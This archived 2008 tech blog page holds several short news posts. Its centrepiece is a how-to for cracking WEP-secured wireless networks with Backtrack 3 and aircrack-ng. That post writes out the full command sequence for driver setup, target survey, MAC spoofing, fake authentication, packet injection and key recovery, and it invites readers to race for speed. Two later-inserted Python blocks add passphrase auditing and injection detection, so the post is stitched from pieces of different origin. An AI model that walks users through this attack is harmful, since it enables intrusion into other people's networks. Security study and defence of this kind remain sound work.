
Thursday, October 30, 2008

Copy a key with only a photo

Keys Can be Copied From Afar, Jacobs School Computer Scientists Show [Jacobs School of Engineering: News & Events]

This just in: computer science researchers at UCSD have released software that can be used to duplicate a key with only
a photo. Apparently, this whole setup works by measuring "key" (pardon the pun) points within the photo to come up
with exact dimensions of the key, which can then be used to create a duplicate. Sounds completely impossible and sci-fi,
but that aside, this has some pretty big implications. Like, don't post pictures of your house/car keys online (at least without
blurring 'em first).
Needless to say, this capability brings up some interesting new possibilities...the locksmith's job just got a whole lot easier.
Of course, one must also consider the potential liabilities, for example house theft and burglary!

calcGRADE 2008 Revision 1 Released

After an unreasonably long wait, for which laziness was partially responsible, Revision 1 of my calcGRADE 2008 gradebook suite for TI-89 Titanium and Voyage 200 graphing calculators has been released. This is mostly a bugfix/cosmetic update, and remedies several major issues. CG2008 R1 is the most stable release yet, and it should handle anything and everything you throw at it. The code was finalized at the beginning of October, but I haven't had a chance to do anything with it until now. So without further ado, here it is!

A changelog...
Revision 1: October 1, 2008

  • info window no longer appears at startup
  • updated About window with new contact info
  • updated Manual
  • fixed critical off-by-one bug preventing creation of new classes after deleting a class
  • class average no longer shows as "undef" in certain scenarios with EC assignments
  • now resets to original folder location when exiting
  • various minor tweaks and optimizations

And some updated screenshots:





I will be posting this on ASAP, but until then, you can pick it up on my account:

As always, a full PDF manual is included.

Enjoy and happy grading!

Friday, October 24, 2008

Developers to get Vista SP2 Next Week

Microsoft to Seed Vista SP2 to Developers Next Week - News and Analysis by PC Magazine

An interesting bit of news. Windows Vista's second service pack may be made available to some developers (not the public) as early as October 29th. Purported features include Windows Search 4, Bluetooth enhancements, native Blu-ray recording, and exFAT FS improvements.
But can this SP save Vista's image? My opinion is no. Even though one can safely say that the majority of users have no problem with Microsoft's latest OS, the small, disgruntled minority has heavily tarnished Vista's public image. Service Pack 2 will do little to change that perception, unfortunately.

Wikipedia School Edition DVD Available

2008/9 Wikipedia Selection for schools

Everyone I know uses Wikipedia, that user-powered, open encyclopedia that may be awesome or awful depending on the article.
Well, Wikipedia has announced the release of a DVD packed with 3.5GB of only "awesome" articles, according to the volunteers
from SOS Children who content-checked the compilation. There are 5500 articles, complete with pictures.
The distribution is only available via BitTorrent (yay!)

Find download details and information here.

Now if only EVERY Wikipedia article could be checked...

Monday, October 20, 2008

NVIDIA releases GeForce 9300/9400 IGPs

DailyTech - NVIDIA Officially Unveils GeForce 9400 and 9300 Integrated GPUs

Not long after the launch of the mobile counterparts in Apple's new MacBook line, NVIDIA has officially unveiled their GeForce 9300/9400 desktop motherboard chipsets for Intel LGA775 processors. These new boards will be available from the typical slew of mobo makers. The new GPUs have 16 cores and are fully equipped to handle H.264, VC-1, and MPEG2 decoding as well as uncompressed 8-channel LPCM - features highly coveted in the home theater PC (HTPC) arena. The new chips are 65nm and should be more powerful yet power-efficient than the previous AMD-based GeForce 8200/8300 generation. Finally, Intel users now have a media/theater platform that can be viable - the new 9300/9400 series is a significant step compared to Intel's flawed G35/G45 boards and nVidia's aging nForce 610/630 boards. For those (heaven forbid) extreme budget gamers, the 9400 actually leads the pack in games like ET: Quake Wars and Age of Conan, when compared to AMD's highly competitive 780G/790GX IGP solution.

Wednesday, October 15, 2008

Flash Player 10 Out Now

Adobe's Flash 10 Player Harnesses Graphics Chips - News and Analysis by PC Magazine

All you Flash users (that's more or less everyone these days), Flash 10 is out now. PC Magazine brings up the interesting point that the release neatly follows Microsoft's unveiling of Silverlight 2.0. Adobe claims that the new Flash will use the GPU to do graphics work and have more sophisticated audio features.

Download now:

Monday, October 13, 2008

HowTo: Crack WEP-Secured Wireless Networks Using Backtrack 3 and the Intel 3945 card

WEP stands for "Wired Equivalent Privacy", but this is more or less a misnomer. Wikipedia goes so far as to call it a "deprecated protocol". WEP definitely does not equal the (relative) privacy on a switched wired network, and provides only a minimal amount of privacy. Why? Well, first of all, the WEP protocol is fundamentally flawed as the initialization vectors (IVs) generated are nonrandom; certain IVs, called weak IVs, are vulnerable to statistical attack. This is where tools like aircrack come in. Today, I'll demonstrate the triviality with which a WEP-"secured" wireless network can be cracked and the key recovered. The tools for the job? Nothing more than a two-year-old commodity laptop with the ubiquitous Intel 3945 wireless card and Backtrack 3, a FOSS Linux distro oriented toward penetration testing. We will be using the aircrack-ng suite to collect data from the target network and its client(s) and perform packet injection.

Before we begin, a disclaimer:
The following information is geared toward people with a thorough and advanced understanding of computer hardware and software. A working knowledge of wireless networking terms and console-based Linux is assumed. If you don't know the difference between a BSSID, ESSID, and a MAC address, or have no idea what Linux is, GET OUT NOW! The information can be used for both good and bad, and it is understood that I take no responsibility for anything that happens as a result, directly or indirectly.

Materials Needed:

  • Backtrack 3 (USB install is preferred, LiveCD is OK too)
  • working laptop with an Intel 3945ABG wireless card
  • WEP-secured wireless network (hopefully your own!!!)

Boot up your lappy and load Backtrack 3. Now, BT3 already has the ipwraw-ng injection driver installed into the kernel. There are two catches, though: it is not enabled by default AND the preinstalled binary is not up to date (2.0.0 instead of 2.3.4).

First, unload the regular iwl3945 driver:
# modprobe -r iwl3945

Prepare and load the new v2.3.4 ipwraw-ng driver:
# cd /opt/drivers/ipwraw-ng
# ./remove-old
# make;make install
# modprobe ipwraw

A little housekeeping to optimize transmission rate and power:
# iwconfig wifi0 rate 1M
# iwconfig wifi0 txpower 16
# cd

If you had trouble running the txpower command, you have NOT properly set up the ipwraw-ng driver!

Now the real fun begins. If you don't already know the BSSID, ESSID, and channel of the target access point, run a survey with airodump-ng:
# airodump-ng wifi0

Once you have obtained those three pieces of information, hit Control-C to exit.

Now we refine airodump-ng to isolate the target network:
# airodump-ng --channel X --bssid TARGETMAC wifi0
Insert your specific channel and BSSID, of course :)

Let this run for a few minutes, then CTRL-C again. If all goes well the MAC address of a wireless client should appear under "STATION". Take note of the MAC, as we will be using it to spoof our own MAC address:
# macchanger -m CLIENTMAC wifi0

Now we will run airodump-ng for real. All captured packets will be saved to disk. Notice the -w flag. DO NOT CLOSE THIS WINDOW!
# airodump-ng --channel X --bssid TARGETMAC -w dump1 wifi0

Technically, we could just sit here and wait for the packet/data count to increase, but that will take a looooong time if the wireless client(s) aren't active. To remedy that, we use packet injection to increase the number of data packets sent by the target AP.

Before we begin injecting, we must perform a fake authentication against the target. Open another window and run:
# aireplay-ng -1 0 -a TARGETMAC -h CLIENTMAC wifi0
If all goes well you should see a message confirming that authentication was successful.

Now that we have "authenticated" against the target AP, we can begin injecting with aireplay-ng. Open yet another window and do:
# aireplay-ng -3 -b TARGETMAC -h CLIENTMAC wifi0
You should see the injection occurring in real time.

Go back to the window with airodump-ng. The data count should be rapidly increasing, and before long you will have tens of thousands of packets!

For cracking a 64-bit WEP key, 40,000 packets are often enough. For a 128-bit key, you want somewhere around 80,000 packets. When a high data count is achieved, aircrack-ng can be started to begin the cracking process:
# aircrack-ng dump1-01.cap

Remember to keep aireplay-ng running, because aircrack can optimize itself with new data packets on-the-fly. The more packets, the faster the cracking (and the more likely you will successfully recover the key.)

With time and a bit of luck you should have the key in hex format...the key to the city, err, network. If it's not your own, be very careful what you decide to do next ;)

And so we have succeeded in demonstrating the ease with which WEP can be defeated, with nothing more than a laptop and some free software tools. The moral of the story? Use WPA/WPA2 encryption, or for maximum security, turn off your wireless altogether. Even these new protocols are vulnerable in certain cases, thanks to dictionary attacks and rainbow tables. An effective way to counter these types of attacks is to use long passwords - WPA2 supports a maximum length of 63 characters.
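To make the passphrase advice concrete, here is an added example (not part of the original post) of how WPA/WPA2-Personal turns a passphrase into its 256-bit key, and a small audit of a candidate passphrase. The SSID is the salt, which is why precomputed tables only work against the network name they were built for; the `COMMON` list and the 20-character minimum are assumptions made for illustration.

```python
import hashlib

# Printable ASCII (32..126) is what a WPA/WPA2 passphrase may contain.
ALLOWED = {chr(c) for c in range(32, 127)}
# Constructed stand-in for a real dictionary of common passwords.
COMMON = {"password", "12345678", "letmein123", "qwertyuiop"}
MIN_POLICY_LEN = 20  # assumed local policy, not a protocol limit


def derive_psk(passphrase, ssid):
    """256-bit PSK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 rounds)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"),
                               ssid.encode("utf-8"), 4096, 32)


def audit_passphrase(passphrase, ssid):
    """Return a list of findings; an empty list means nothing was flagged."""
    findings = []
    if not 8 <= len(passphrase) <= 63:
        findings.append("length outside the 8-63 character range")
    if any(ch not in ALLOWED for ch in passphrase):
        findings.append("contains a character outside printable ASCII")
    if passphrase.lower() in COMMON:
        findings.append("found in common-password list")
    if ssid and ssid.lower() in passphrase.lower():
        findings.append("contains the network name")
    if len(passphrase) < MIN_POLICY_LEN:
        findings.append("shorter than local policy minimum")
    return findings


if __name__ == "__main__":
    # Same passphrase, two SSIDs: the keys differ, so a table precomputed
    # for one network name is useless against another.
    for ssid in ("IEEE", "HomeNet-5F2A"):
        print(ssid, derive_psk("password", ssid).hex())
    print(audit_passphrase("password", "IEEE"))
    print(audit_passphrase("tidal-Crane7 orbits quiet%lamp", "HomeNet-5F2A"))
```

A default or very common SSID gives up the benefit of the salt, so changing the network name to something unique is part of the same defence.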

There you have it - a nice and simple "basic" WEP crack. This method assumes an ideal scenario where at least one wireless client is present. If no clients are present, more work must be done in order to generate data packets - this requires packet crafting and is beyond the current scope. Try your hand a few times and see how fast you can go. Can you beat the FBI's three-minute mark (set back in 2005) or the more recent times of less than a minute?
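Seen from the access point's side, the injection step above leaves two traces: one client MAC suddenly sends a flood of identical-size data frames, and because a second radio is borrowing that MAC, two independent 802.11 sequence counters interleave under one address. The following added example (not part of the original post) checks for both over frame metadata; the record layout, thresholds, MAC addresses and sample capture are all constructed assumptions.

```python
from collections import defaultdict, deque


def seq_gap(prev, cur):
    """Forward distance between two 12-bit 802.11 sequence numbers."""
    return (cur - prev) % 4096


def analyze(frames, window=1.0, rate_limit=100, max_gap=64, min_jumps=5):
    """frames: time-sorted (ts, src_mac, seq, length) data-frame records.
    Returns {src_mac: set of findings}."""
    recent = defaultdict(deque)      # (src, length) -> timestamps in window
    last_seq, jumps = {}, defaultdict(int)
    findings = defaultdict(set)
    for ts, src, seq, length in frames:
        q = recent[(src, length)]
        q.append(ts)
        while ts - q[0] > window:    # drop timestamps older than the window
            q.popleft()
        if len(q) >= rate_limit:
            findings[src].add("same-size data frame flood")
        # One transmitter counts up steadily; large repeated gaps mean
        # two counters are being observed under a single MAC address.
        if src in last_seq and seq_gap(last_seq[src], seq) > max_gap:
            jumps[src] += 1
            if jumps[src] >= min_jumps:
                findings[src].add("interleaved sequence counters")
        last_seq[src] = seq
    return dict(findings)


def sample_capture():
    """Constructed two-second capture: two clients plus one MAC reuse."""
    victim, quiet = "02:00:00:aa:bb:cc", "02:00:00:dd:ee:ff"
    frames = []
    for i in range(40):              # normal traffic, 20 frames/s each
        frames.append((i * 0.05, victim, 100 + i, 200 + (i * 37) % 900))
        frames.append((i * 0.05 + 0.0005, quiet, 500 + i, 300 + (i * 53) % 700))
    for i in range(1000):            # second radio reusing victim's MAC
        frames.append((i * 0.002 + 0.001, victim, 3000 + i, 68))
    return sorted(frames)


if __name__ == "__main__":
    print(analyze(sample_capture()))
```

Both thresholds need tuning against normal traffic on the network being monitored; a wireless intrusion detection system applies the same idea to live frames.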

Sunday, October 5, 2008

KVIrc 3.4.0 ThinApp Released

Today I bring you a portable ThinApp version of the free, open-source chat client KVIrc, version 3.4.0. It's my IRC client of choice, and in my opinion can hold its own against shareware client mIRC in just about every aspect.

Grab your copy and throw it onto your USB here:

Download from SkyDrive